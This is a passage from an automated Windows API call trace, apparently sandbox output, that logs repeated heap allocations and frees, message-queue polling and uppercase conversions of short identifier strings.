(HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0206.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.782] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.787] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.787] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.788] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.788] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.788] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.789] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.789] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.790] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.790] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.790] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, 